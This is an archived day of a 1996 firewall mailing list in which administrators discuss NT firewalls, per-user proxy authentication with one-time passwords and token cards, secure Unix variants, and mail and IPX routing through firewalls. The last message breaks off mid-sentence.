Technology Garrison Associates jeromie@garrison.com From firewalls-owner Wed Feb 7 06:09:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA08886 for firewalls-outgoing; Wed, 7 Feb 1996 06:07:08 -0800 (PST) Received: from server. ([198.199.198.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA08881 for ; Wed, 7 Feb 1996 06:07:04 -0800 (PST) Received: from DMT.fc.com ([198.199.198.164]) by server. (8.6.12/8.6.12) with SMTP id KAA02865 for ; Wed, 7 Feb 1996 10:39:03 -0500 Message-ID: <3118B1D7.7C54@fc.com> Date: Wed, 07 Feb 1996 09:06:15 -0500 From: "Douglas M. Todd, Jr." Organization: fc.com X-Mailer: Mozilla 2.0GoldB1 (Win95; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: NT Firewalls/Web Servers Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone know of any good NT Firewalls and Web Servers? ==DMT> -- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >Douglas M. Todd, Jr. fc.com, Inc. One Federal Street BLD 102 Springfield, MA 01105 PHN: 413-733-7333 FAX: 413-733-7725 Email: Doug@fc.com or Bunyan@msn.com From firewalls-owner Wed Feb 7 06:54:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA09757 for firewalls-outgoing; Wed, 7 Feb 1996 06:44:53 -0800 (PST) Received: from protosoft.com ([204.128.207.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA09744 for ; Wed, 7 Feb 1996 06:44:48 -0800 (PST) Received: by protosoft.com (4.1/SMI-4.1) id AA14974; Wed, 7 Feb 96 08:42:45 CST Date: Wed, 7 Feb 1996 08:42:45 -0600 (CST) From: Mohammed Ali To: Matts Kallioniemi Cc: Sick Puppy , firewalls@GreatCircle.COM Subject: Re: Need a few pointers In-Reply-To: <199602061550.QAA17949@mail.pi.se> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 6 Feb 1996, Matts Kallioniemi wrote: > At 17.41 1996-02-05 -0500, Sick Puppy wrote: > >There was a very good response to my query. I had no idea there were > >so many security problems and performance problems associated with > >WindBlows 95. Sounds like the operating system was written by a couple > >of drunken cats. In a couple of days I will get the responses together > >in one file, together with a couple of good web pointers, and pass it on > >to anyone who wants an e-mailed copy. > > I want one, please! Why don't you post it to the list? I also want a copy, please mail it to the list. Mohammed Ali. From firewalls-owner Wed Feb 7 07:38:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA10595 for firewalls-outgoing; Wed, 7 Feb 1996 07:12:01 -0800 (PST) Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA10590 for ; Wed, 7 Feb 1996 07:11:56 -0800 (PST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id JAA23576 for ; Wed, 7 Feb 1996 09:11:22 -0600 (CST) Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.7.2/8.7.2) with SMTP id JAA23572 for ; Wed, 7 Feb 1996 09:11:21 -0600 (CST) Received: from zuhn.sctc.com (zuhn.sctc.com [172.17.1.134]) by spirit.sctc.com (8.6.12/8.6.9) with SMTP id JAA10390; Wed, 7 Feb 1996 09:11:52 -0600 Message-Id: <199602071511.JAA10390@spirit.sctc.com> Date: Wed, 07 Feb 1996 09:11:48 -0600 From: zuhn@sctc.com (david d `zoo' zuhn) To: firewalls@greatcircle.com Subject: Re: User level firewall / proxy authentication References: <3117F7B3.3647@mecx05.colesmyer.com.au> Organization: Secure Computing Corporation; Roseville, MN Sender: firewalls-owner@GreatCircle.COM Precedence: bulk // > Are there any firewall or proxy server products available that will allow // > outgoing user authentication based upon a user id, rather than an IP // > address? // > // > Our users are mobile and this makes it difficult to restrict internet // > access on a per user basis, since their source IP address is likely to // > change. // // This sounds pretty unsafe! How do you prevent me from spoofing one of // your users? Yes, there are several firewall systems that handle authentication on a per-user basis. All that I know of will also allow permission acl's that include host address ranges as well. This can be useful when dealing with a range of dynamic addresses (such as allocated by DHCP or similar protocols), requiring userid based authentication for those addresses, and relying on host-based permissions for the static addresses on the network. As for the safety, there are usually a variety of means available for user authentication. Those I have seen in the market range from insecure username & reusable passwords (a la Unix passwords) to software based challenge-response systems (LOCKout or S/Key) to hardware based token cards of some form or another (SecurID, SNK). A common tradeoff in authentication systems is price vs. unspoofability. For many sites, outbound authentication is used more for accounting chargeback schemes than for any more stringent authorization, so a reusable password system isn't unreasonable. But I'd never trust inbound authentication to anything that doesn't use some form of cryptographically secure algorithm. -- david d `zoo' zuhn --- secure computing corporation zuhn@sctc.com From firewalls-owner Wed Feb 7 07:53:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA10951 for firewalls-outgoing; Wed, 7 Feb 1996 07:27:19 -0800 (PST) Received: from gatekeeper.vitro.com (gatekeeper.vitro.com [149.32.254.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA10944 for ; Wed, 7 Feb 1996 07:27:10 -0800 (PST) From: don_tompkins@esd.tracor.com Received: by gatekeeper.vitro.com (5.65/DEC-Ultrix/4.3) id AA12018; Wed, 7 Feb 1996 10:25:45 -0500 Received: from esd.vitro.com(131.189.79.30) by gatekeeper.vitro.com via smap (V1.3) id sma012004; Wed Feb 7 10:25:37 1996 Received: from ccMail by esd.tracor.com (IMA Internet Exchange 1.04b) id 118c4360; Wed, 7 Feb 96 10:24:38 -0500 Mime-Version: 1.0 Date: Wed, 7 Feb 1996 08:38:44 -0500 Message-Id: <118c4360@esd.tracor.com> Subject: Most Secure Unix? To: giff@congress.east.sun.com (Wayne Gifford - Internet Commerce Group), Firewalls@GreatCircle.COM Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What about HP-UX BLS. Other B level efforts are also underway... Concur administration is important. From firewalls-owner Wed Feb 7 08:09:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA11413 for firewalls-outgoing; Wed, 7 Feb 1996 07:46:47 -0800 (PST) Received: from usia.gov (XGATE.USIA.GOV [198.67.64.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA11407 for ; Wed, 7 Feb 1996 07:46:39 -0800 (PST) Received: from NetWare MHS (SMF70) by usia.gov via Connect2-SMTP 4.00; Wed, 7 Feb 96 10:46:18 -0500 Message-ID: <80C818310136C8D1@usia.gov> Date: Wed, 7 Feb 96 10:42:40 -0500 From: "Lehrer, Neil" Organization: USIA To: firewalls@greatcircle.com Subject: firewalls, email, and dns X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway Sender: firewalls-owner@GreatCircle.COM Precedence: bulk hi, our smtp mail server is an smtp/mhs gateway that runs on DOS. since it does not have the traditional sendmail vulnerabilities can I/should I allow smtp traffic through a firewall to it rather than having a mail forwarder outside the firewall receive the mail and send it to the gateway? yes/no? and if yes, are there any other considerations, for example, how should i set up the internal and external dns's? cc to my email would be great. thanks. Regards +++++++++++++++++++++++++++++++++++++++ + Neil Lehrer + U.S. Information Agency + Networks and Systems Support Division + + voice 202 619-0903 + fax 202 619-3883 + internet nlehrer@usia.gov + + "oh what a tangled net we weave + when we seek to retrieve." + +++++++++++++++++++++++++++++++++++++++ From firewalls-owner Wed Feb 7 08:40:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA12742 for firewalls-outgoing; Wed, 7 Feb 1996 08:18:11 -0800 (PST) Received: from netsurfer.pixi.com (netsurfer.pixi.com [140.174.243.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA12737 for ; Wed, 7 Feb 1996 08:18:06 -0800 (PST) Received: from netsurfer by netsurfer.pixi.com ; 7 FEB 96 06:12:59 Date: Wed, 7 Feb 1996 06:12:58 -1000 (HST) From: NetSurfer X-Sender: netsurf@netsurfer To: SATEESHB Cc: firewalls@greatcircle.com, Jeromie Jackson , winnt-l@eva.dc.lsoft.com Subject: Re: NT's TCP/IP stack + NetManage NEWT conflict. In-Reply-To: <9601078236.AA823691133@smtp_gw.inf.com> Message-ID: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Are you running the Windows Chameleon or the NT Chameleon? On -1 xxx -1, SATEESHB wrote: > I faced problems with NetManage Chameleon version 5.0 .It starts a > program called NEWT(NetManage Enhanced Windows Tcp/IP). 8< snip 8< snip #include _ __ __ _____ ____ / | / /__ / /_/ ___/__ _______/ __/__ _____ / |/ / _ \/ __/\__ \/ / / / ___/ /_/ _ \/ ___/ / /| / __/ /_ ___/ / /_/ / / / __/ __/ / ================/_/=|_/\___/\__//____/\__,_/_/==/_/==\___/_/=============== From firewalls-owner Wed Feb 7 08:53:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA12226 for firewalls-outgoing; Wed, 7 Feb 1996 08:07:19 -0800 (PST) Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA12221 for ; Wed, 7 Feb 1996 08:07:13 -0800 (PST) Received: by Disclosure.COM (4.1/SMI-4.1) id AA19254; Wed, 7 Feb 96 11:09:47 EST Date: Wed, 7 Feb 1996 11:09:46 -0500 (EST) From: Scott Barman To: Wayne Gifford - Internet Commerce Group Cc: Firewalls@GreatCircle.COM Subject: Re: Most Secure Unix? In-Reply-To: <199601292147.QAA06214@traveller.East.Sun.COM> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 29 Jan 1996, Wayne Gifford - Internet Commerce Group wrote: > > There are no secure UNIXes, only security concious administrators Geez... we're back on this again? How about: There are no secure OPERATING SYSTEMS, only security conscience administrators/sysops/people who give a darn. Is that OK and politically correct? I sure hope so! scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." - scott barman From firewalls-owner Wed Feb 7 08:55:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA12760 for firewalls-outgoing; Wed, 7 Feb 1996 08:18:23 -0800 (PST) Received: from tuna.wang.com (tuna.wang.com [150.124.136.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA12746 for ; Wed, 7 Feb 1996 08:18:16 -0800 (PST) Received: from mail.wangfed.com (ns.wangfed.com [159.94.10.19]) by tuna.wang.com (8.6.12/8.6.12tf1) with SMTP id LAA26781 for ; Wed, 7 Feb 1996 11:17:27 -0500 Received: from [159.94.10.15] by mail.wangfed.com (1.37.109.4/A.09.00a) id AA29082; Wed, 7 Feb 96 11:08:26 -0600 Received: from [159.94.14.48] by hfsi (BULL 5.61++/B.O.S 02.01) id AA10205; Wed, 7 Feb 96 11:05:02 -0500 Date: Wed, 7 Feb 96 11:05:02 -0500 Message-Id: <9602071605.AA10205@hfsi> From: "KM" Reply-To: "KM" To: firewalls@GreatCircle.COM Subject: Re: Survey Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message <199602061540.KAA18136@Fe3.rust.net> "Kenneth J. Stephens" writes: > If the magazine publishers forced the issue date onto all of their reprints > the vendors would have little use for the reprints. The date stamp would > obsolete > the reprint so quickly that the vendor would look foolish for distributing > old info. One of the hazards of a dynamic industry. So what you're saying is that the publishers, in collusion with the vendors, are being dishonest by omission. Why doesn't this suprise me? ------------------------------------------------------ Karen Goertzel Manager, International Programmes and Special Projects Secure Systems and Services Operation Wang Federal, Inc. 7900 Westpark Drive - MS 700 McLean, Virginia 22102-4299 TEL: 703-827 3914 FAX: 703-827 3161 goertzek@wangfed.com http://www.wangfed.com +------------------------------+ | It infuriates me to be wrong | | when I know I'm right. | | -- Moliere | +------------------------------+ From firewalls-owner Wed Feb 7 09:09:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA13097 for firewalls-outgoing; Wed, 7 Feb 1996 08:24:18 -0800 (PST) Received: from usia.gov (XGATE.USIA.GOV [198.67.64.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA13087 for ; Wed, 7 Feb 1996 08:24:12 -0800 (PST) Received: from NetWare MHS (SMF70) by usia.gov via Connect2-SMTP 4.00; Wed, 7 Feb 96 11:24:03 -0500 Message-ID: <88C818310136C8D1@usia.gov> In-Reply-To: <0A1F09310136C8D1> Date: Wed, 7 Feb 96 11:19:33 -0500 From: "Lehrer, Neil" Organization: USIA To: firewalls@greatcircle.com Subject: ipx routing X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: Re IPX routing paul.carrol@medaphis.com offered up: >I am about to setup a firewall for our Internet link. > >I have recently learned that we are bringing in an X.25 line from Compuserve. >The line runs into a Compuserve box that resides here that we do NOT control. > >From the Compuserve box, a line runs into one of our router interfaces. > >Obviously, I want to firewall this link as well... >It passes IPX and TCP/IP, and needs to do both. > >The problem I have is with IPX. We have decided on Raptor Eagle as our firewall. >It will run on a SUN Sparc 20, and it will NOT pass IPX. > >Any suggestions? Well .. not sure whether this works or not, but I'd be interested in comments myself. Is IPX critical for you ? I ask because we're running IP and IPX on our LAN here, and I'm being pushed to allow both across our firewalling mechanism. Our Netware guy said to me the other day that we needed IPX as some products actually require IPX in order to work. This sounds like snake oil to me - I'd have thought that the underlying protocol - whether IP or IPX should make no difference whatsoever. Any comments on this ? It's also been suggested to me that Novell/IP works by simply encapsulating IPX within an IP packet - this doesn't quite sound like full IP to me. Can anyone comment upon this ? If we can move everything to IP, then our problems potentially disappear here, and I needn't route IPX at all. Sound easy to me from there (ish!). I wonder Paul, whether you could do something along these lines ? I wonder everyone whether you all think I'm pouring snake oil around the place too ? :) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` it is true that some netware products use ipx/spx directly. whether they would work properly, or at all, with netware/ip is something you would have to test (unfortunately). Regards +++++++++++++++++++++++++++++++++++++++ + Neil Lehrer + U.S. Information Agency + Networks and Systems Support Division + + voice 202 619-0903 + fax 202 619-3883 + internet nlehrer@usia.gov + + "oh what a tangled net we weave + when we seek to retrieve." + +++++++++++++++++++++++++++++++++++++++ From firewalls-owner Wed Feb 7 09:24:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA14114 for firewalls-outgoing; Wed, 7 Feb 1996 08:41:56 -0800 (PST) Received: from server1.startel.com.ar ([200.26.1.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA14083 for ; Wed, 7 Feb 1996 08:41:43 -0800 (PST) Received: from [200.26.8.62] (ts1-ppp15.starnet.net.ar) by server1.startel.com.ar with SMTP id AA18039 (5.67b/IDA-1.4.4 for ); Wed, 7 Feb 1996 13:37:32 +0300 Message-Id: <199602071037.AA18039@server1.startel.com.ar> To: "firewalls@GreatCircle.com" Subject: DNS for NT Date: Thu, 08 Feb 96 13:41:42 -0500 From: Eduardo Torres X-Mailer: E-Mail Connection v2.5.03 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -- [ From: Eduardo Torres * EMC.Ver #2.5.02 ] -- Can anyone recommend a good DNS solution for NT? Thank you, Eduardo -- ------------------------------------------- Eduardo Jose Torres STARTEL S.A. Marketing - Internet Leandro N. Alem 628 2do Piso 1001 Buenos Aires Argentina Tel: 54-1-318-6000 Fax: 54-1-318-6376 ------------------------------------------- From firewalls-owner Wed Feb 7 09:53:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA14283 for firewalls-outgoing; Wed, 7 Feb 1996 08:45:32 -0800 (PST) Received: from wizard.pn.com (wizard.pn.com [204.96.36.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA14261 for ; Wed, 7 Feb 1996 08:45:25 -0800 (PST) Received: from synaxis.com (mail.synaxis.com [204.96.42.66]) by wizard.pn.com (8.6.12) with SMTP id LAA04098 for ; Wed, 7 Feb 1996 11:44:36 -0500 Received: from Synaxis-Message_Server by synaxis.com with Novell_GroupWise; Wed, 07 Feb 1996 11:43:10 -0500 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Wed, 07 Feb 1996 11:19:29 -0500 From: Chris Jenkins To: doug@fc.com, firewalls@GreatCircle.COM Subject: NT Firewalls/Web Servers -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Raptor Systems makes a one of the only firewall products I know of for NT. I will be gettin an eval in to test it out... Chris Jenkins cjenkins@synaxis.com >>> Douglas M. Todd, Jr. 02/07/96 09:06am >>> Does anyone know of any good NT Firewalls and Web Servers? ==DMT> -- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >Douglas M. Todd, Jr. fc.com, Inc. One Federal Street BLD 102 Springfield, MA 01105 PHN: 413-733-7333 FAX: 413-733-7725 Email: Doug@fc.com or Bunyan@msn.com From firewalls-owner Wed Feb 7 09:57:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA13341 for firewalls-outgoing; Wed, 7 Feb 1996 08:28:17 -0800 (PST) Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA13317 for ; Wed, 7 Feb 1996 08:28:08 -0800 (PST) Received: by Disclosure.COM (4.1/SMI-4.1) id AA19351; Wed, 7 Feb 96 11:30:27 EST Date: Wed, 7 Feb 1996 11:30:25 -0500 (EST) From: Scott Barman To: Russ Cc: "'Jeromie Jackson'" , "'Firewalls'" Subject: RE: NT's TCP/IP stack In-Reply-To: <01BAF4F6.E8D957C0@rwcooper.RC.Toronto.on.ca> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 7 Feb 1996, Russ wrote: > [Firewall relevance] > To some extent, there may be some relief to all of this on the horizon. > With the introduction of Raptor and soon Network-1 into the Windows NT > realm of Firewalls, there are seriously security conscious individuals who > will have to track these changes to see if they affect their product. > Hopefully this will lead to increased scrutiny of the product from a > specifically secure standpoint. There are three firewall built on top of NT, not including the vaporware Micro$haft themselves are touting. I have been in contact with someone who has evaluated two of them. Unfortunatly, I cannot say who or give further details (this person will be publishing this information in one of the "major" industry rags), but let's just say that my suspicion has been confirmed: you cannot use these systems for anything faster than a 64Kbps connection. T1, or even fractional T1 (128Kbps), start showing failture. > [Shameless plug] > Of course, with the just announced strategic partnership between MCI and > Microsoft (and of course, SHL), and the fact that MCI will be hosting MSN > on the Internet, we will hopefully see lots more NT boxes on the Internet, > again, forcing people to look more closely at the viability of securing NT > boxes. Maybe Micro$loth is hoping Vint Cerf will help their sagging system. Then again companies are into prostitution for the sake of the bottom line--read "On the Line" regarding this statement and MCI. Hopefully, when folks put NT on the internet, they will find the same thing I found through experimentation: it has multitasking that can't get out of its own way, it can't handle the load of a medium-low environment, and if something goes wrong, there isn't a quick interface to fix things (by passing that maze of twisty little menus all different!). > There's definitely something wrong with someone like me who lives for these > types of questions, I guess I just love the controversy! ;-] Yea, it's called living the hype and beliving the b.s. from marketing machines. No controversy here--especially when I don't believe what I read or hear from know M.$.... err... b.s. artists. scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." - scott barman From firewalls-owner Wed Feb 7 10:01:54 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA14528 for firewalls-outgoing; Wed, 7 Feb 1996 08:52:08 -0800 (PST) Received: from wizard.pn.com (wizard.pn.com [204.96.36.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA14522 for ; Wed, 7 Feb 1996 08:52:00 -0800 (PST) Received: from synaxis.com (mail.synaxis.com [204.96.42.66]) by wizard.pn.com (8.6.12) with SMTP id LAA04470 for ; Wed, 7 Feb 1996 11:51:06 -0500 Received: from Synaxis-Message_Server by synaxis.com with Novell_GroupWise; Wed, 07 Feb 1996 11:49:52 -0500 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Wed, 07 Feb 1996 11:26:12 -0500 From: Chris Jenkins To: winnt-l@eva.dc.lsoft.com, jeromie@garrison.com, firewalls@greatcircle.com, SATEESHB@inf.com Subject: Re: NT's TCP/IP stack + NetManage NEWT conflict. -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk all of the newest (and even WFW311) come with a free TCPIP stack. Third party applications like Chameleon, LanWorkPlace, etc....come with their own stacks. In most cases, you should be able to get applications (Telnet, FTP, mail, etc) from one third-party product to work over anothers TCP/IP stack. This is where the WINSOCK standard comes in. More specialized TCP/IP functions running on Windows (such as XServer, 3270, etc) may require a stack/Winsock specific to that particular product. Since MS gives you TCP/IP and WINSOCK, most third party applications should be able to run. If I recall correctly, I think that some of Chameleons applications will run on MS tcp/ip stack. Anyway......jsut been my experience Chris Jenkins cjenkins@synaxis.com >>> SATEESHB 02/07/96 08:07am >>> well, I don't know how relevant is the reply to your needs. I faced problems with NetManage Chameleon version 5.0 .It starts a program called NEWT(NetManage Enhanced Windows Tcp/IP). When I try to run one of my programs which is a service from service control panel, it hangs.Even that cute messagebox "Attempting to start Service " with the small clock also doesn't come up. After wasting many hours and losing sleep, I found out that if I rename NEWT.exe to some other name so it would fail to get loaded automatically, the SCM behaves properly. I feel, NEWT tcp/ip might be conflicting with NT TCP/IP. Why should NetManage guys have a different program for this when NT provides one is beyond my comprehension. It would be of help to me if some one can tell me how is Service Control Manager is related to TCP/IP here?.(Is it something to do with RPC stuff they talk about for starting services remotely?.In my case I started locally). Any discussion on NT TCP/IP stack will be greatly appreciated. Regards, Sateesh Babu N S, Systems Analyst, Infosys Technologies Ltd, Bangalore India. ______________________________ Reply Separator _________________________________ Subject: NT's TCP/IP stack Author: jeromie@garrison.com (Jeromie Jackson) at SMTP_GW Date: 2/6/96 7:03 PM As we have all seen in the last few weeks, there have been several people who have been ragging on Windows NT TCP/IP stack. I would like to hear some comments on real problems that have been detected. I have looked around the net, although no hard-fact information could I find. NT appears to have some good qualities, ease-of-use, although I am unsure about several things. The integrity of the OS. Nobody can test it well. Who's to say what holes are under the hood that nobody has a good chance to look at. The TCP/IP stack has been said to have problems. They are not a security company, therefore I am very unwilling to assume they have done the proper testing for security purposes. For that matter, I am unwilling to assume the product isn't full of "Microsoft Features" that are undocumented.. I would be very interested in hearing about these issues. Jeromie Jackson Director of Technology Garrison Associates jeromie@garrison.com From firewalls-owner Wed Feb 7 10:06:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA15908 for firewalls-outgoing; Wed, 7 Feb 1996 09:30:30 -0800 (PST) Received: from smtp-gw01.ny.us.ibm.net ([165.87.194.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA15903 for ; Wed, 7 Feb 1996 09:30:26 -0800 (PST) From: pcuser@slip133-140.dc.us.ibm.net Received: (from uucp@localhost) by smtp-gw01.ny.us.ibm.net (8.6.9/8.6.9) id RAA79113 for <@smtp-gw01.ny.us.ibm.net:firewalls@greatcircle.com>; Wed, 7 Feb 1996 17:29:37 GMT Message-Id: <199602071729.RAA79113@smtp-gw01.ny.us.ibm.net> Received: from slip133-140.dc.us.ibm.net(129.37.133.140) by smtp-gw01.ny.us.ibm.net via smap (V1.3mjr) id smaiNwCKs; Wed Feb 7 17:29:26 1996 Date: Tue, 6 Feb 96 10:04:23 PST Subject: Firewalls Product Comparison To: @smtp-gw01.ny.us.ibm.net:firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi guys, I need to prepare a comparative study between Sunīs Firewall 1 and IBM NetSP, for the end of this week. Does anyone Knows where I could find some interesting articles concerning both of these products?? Any help woul be appreciated. Wilmer Caripe EMSCA - ENGINEERING AND MANUFACTURING SYSTEMS CARACAS, VENEZUELA From firewalls-owner Wed Feb 7 10:08:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA15536 for firewalls-outgoing; Wed, 7 Feb 1996 09:20:20 -0800 (PST) Received: from arthur.crpht.lu (arthur.crpht.lu [158.64.4.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA15531 for ; Wed, 7 Feb 1996 09:20:09 -0800 (PST) Received: from cnsmac1.crpht.lu by arthur.crpht.lu with SMTP (1.37.109.4/16.2) id AA15004; Wed, 7 Feb 96 18:18:54 +0100 X-Sender: security@arthur.crpht.lu Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 7 Feb 1996 18:24:43 +0100 To: firewalls-digest@GreatCircle.COM From: security@crpht.lu (Bruno MAMER) Subject: Firewall, yes, but policy first ! Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi everyone, Just a small question, last August, "Jim Carroll" talked of the book "Information Security Policies Made Easy". We've decided to buy it but lack references. Does anyone have the editor, ISBN number ? TIA Bruno _________________________________________________________________________ Bruno MAMER bruno.mamer@crpht.lu Centre de Recherche Public Henri Tudor Computing and Network Services Our local archive on security : http://www.crpht.lu/CNS/html/PubServ/Security/security-home.html ------------------------------------------------------------------------- From firewalls-owner Wed Feb 7 10:38:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA18861 for firewalls-outgoing; Wed, 7 Feb 1996 10:23:46 -0800 (PST) Received: from garrison.com. (garrison.garrison.com [199.1.78.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA18846 for ; Wed, 7 Feb 1996 10:23:38 -0800 (PST) Received: by garrison.com. (4.1/Nutered Mailer) id AA05279; Wed, 7 Feb 96 12:20:27 CST Date: Wed, 7 Feb 96 12:20:27 CST From: jeromie@garrison.com (Jeromie Jackson) Message-Id: <9602071820.AA05279@garrison.com.> To: firewalls@greatcircle.com, zuhn@sctc.com Subject: Re: User level firewall / proxy authentication Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > // > Are there any firewall or proxy server products available that will allow > // > outgoing user authentication based upon a user id, rather than an IP > // > address? > As for the safety, there are usually a variety of means available for user > authentication. Those I have seen in the market range from insecure > username & reusable passwords (a la Unix passwords) to software based > challenge-response systems (LOCKout or S/Key) to hardware based token > cards of some form or another (SecurID, SNK). A common tradeoff in > authentication systems is price vs. unspoofability. The one thing to remember is that when using One-Time Password products is that only the inital login converstation is authenticated. If a user authenticates himself to a machine, and then starts a session he is still vulerable to hijacks, sniffing & spoofing. If you were to use an encryption device such as the Persona card, or the Smartcat product, or Cryptocard, you will have continual authentication & confidentiality. This continual encryption will patch up the above mentioned weaknesses that OTP products do not address. Jeromie Jackson Garrison Technologies jeromie@garrison.com From firewalls-owner Wed Feb 7 11:14:09 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA20417 for firewalls-outgoing; Wed, 7 Feb 1996 10:48:22 -0800 (PST) Received: from netcom.netcom.com (netcom.netcom.com [192.100.81.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA20410 for ; Wed, 7 Feb 1996 10:48:17 -0800 (PST) Received: by netcom.netcom.com (8.6.12/Netcom) id KAA29708; Wed, 7 Feb 1996 10:05:05 -0800 Date: Wed, 7 Feb 1996 10:04:59 -0800 (PST) From: Bob Bosen Subject: Re: User level firewall / proxy authentication To: Graham Jose cc: "firewalls@GreatCircle.COM" In-Reply-To: <3117F7B3.3647@mecx05.colesmyer.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 7 Feb 1996, Graham Jose wrote: > Are there any firewall or proxy server products available that will allow > outgoing user authentication based upon a user id, rather than an IP address? > > Our users are mobile and this makes it difficult to restrict internet access on a > per user basis, since their source IP address is likely to change. > > Thanks, > > Graham > -- > Graham Jose, Technical Analyst, Information Systems Security > Retail Technology Services, Coles Myer Limited (Australia) > Voice: +613 9483 7613 Email: gjose@mecx05.colesmyer.com.au > Most existing firewall products can be supplemented with an interface to some kind of enhanced user authentication. This may use a published protocol such as XTACACS, TACACS+, RADIUS, or (our own) EASSP, or it may use a proprietary protocol. Most of the enhanced user authentication vendors market some kind of authentication server(s) that include (at least) a proprietary API or (hopefully) one or more published APIs and/or support one or more of the aforementioned protocols. You can obtain free authentication protocol server daemons supporting the aforementioned protocols from several of the more popular vendors of routers and commservers and firewalls. When you are thinking about authenticating user identity on the Internet, make sure your implementation is non-replayable. Stealing memorized passwords would be your 